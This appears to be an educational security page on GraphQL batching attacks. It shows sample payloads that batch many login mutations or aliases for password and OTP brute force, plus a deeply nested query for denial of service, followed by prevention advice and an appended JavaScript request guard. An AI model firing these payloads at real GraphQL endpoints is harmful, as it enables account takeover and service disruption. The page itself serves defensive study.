GraphQL Batching Attack

A GraphQL batching attack exploits GraphQL's ability to execute multiple operations in a single HTTP request, either as a JSON array of operations or as many aliased fields in one query. Attackers abuse this to bypass per-request rate limiting, brute-force credentials, or cause denial of service.

Attack Types

Query Batching for Brute Force

# Single request tests multiple credentials
[
  {"query": "mutation { login(user:\"admin\", pass:\"password1\") { token }}"},
  {"query": "mutation { login(user:\"admin\", pass:\"password2\") { token }}"},
  {"query": "mutation { login(user:\"admin\", pass:\"password3\") { token }}"},
  # ... hundreds more in one request
]

Alias-Based Batching

# Multiple operations using aliases in single query
query {
  a1: login(user: "admin", pass: "pass1") { token }
  a2: login(user: "admin", pass: "pass2") { token }
  a3: login(user: "admin", pass: "pass3") { token }
  # ... continue with more aliases
}

Resource Exhaustion

# Deep nesting causes exponential database queries
query {
  users {
    friends {
      friends {
        friends {
          posts { comments { author { posts { ... }}}}
        }
      }
    }
  }
}

Security Impact

  • Rate limit bypass (one request, many operations)
  • Credential brute forcing at scale
  • OTP/2FA code enumeration
  • Denial of service through query complexity

Prevention

  • Limit batch size / operations per request
  • Implement query complexity analysis
  • Rate limit by operation count, not just requests
  • Set depth and breadth limits on queries
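The checks listed under Prevention, as an added example that is not part of the original page: a guard run on the raw JSON body before execution, which caps batch size, counts root fields (so aliases are counted as separate operations and summed across the batch) and rejects over-deep selection sets. The limit values and function names are assumptions made for this example.

```javascript
// Added example, not from the original page: a pre-execution guard that
// applies the "Prevention" items to a raw JSON request body. It caps the
// number of operations in a JSON batch, the root fields per request (each
// alias counts as one operation), and selection-set nesting depth. The
// limit values and function names are this example's own assumptions.
const LIMITS = { batch: 5, rootFields: 3, depth: 6 };

// Blank out string literals, then strip comments, so braces or '#' inside
// them do not confuse the scan (assumes no triple-quoted block strings).
function stripLiterals(query) {
  return query.replace(/"(?:\\.|[^"\\])*"/g, '""').replace(/#[^\n]*/g, '');
}

// Count fields in the outermost selection set and the maximum nesting depth.
// Names inside argument parentheses, after ':' (alias target) or after '@'
// (directive) are not fields; a fragment spread counts as one selection.
function measure(query) {
  const tokens = stripLiterals(query).match(/[_A-Za-z][_0-9A-Za-z]*|[^\s,]/g) || [];
  let depth = 0, maxDepth = 0, parens = 0, rootFields = 0, prev = '';
  for (const t of tokens) {
    if (t === '{') { depth++; maxDepth = Math.max(maxDepth, depth); }
    else if (t === '}') depth--;
    else if (t === '(') parens++;
    else if (t === ')') parens--;
    else if (depth === 1 && parens === 0 && /^[_A-Za-z]/.test(t)
             && prev !== ':' && prev !== '@') rootFields++;
    prev = t;
  }
  return { rootFields, depth: maxDepth };
}

// Returns null when the request may proceed, otherwise the rejection reason.
// Root fields are summed across the whole batch, so the cap is enforced per
// request rather than per operation (rate limiting by operation count).
function checkRequest(body, limits = LIMITS) {
  const ops = Array.isArray(body) ? body : [body];
  if (ops.length > limits.batch) return `batch of ${ops.length} exceeds ${limits.batch}`;
  let total = 0;
  for (const op of ops) {
    if (!op || typeof op.query !== 'string') return 'malformed operation';
    const m = measure(op.query);
    if (m.depth > limits.depth) return `depth ${m.depth} exceeds ${limits.depth}`;
    total += m.rootFields;
  }
  if (total > limits.rootFields) return `${total} operations exceed ${limits.rootFields}`;
  return null;
}
```

With these limits the three-alias login query above stays within the root-field cap, while the nested query above (depth 9) and a batch array of more than five operations are rejected before any resolver runs.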
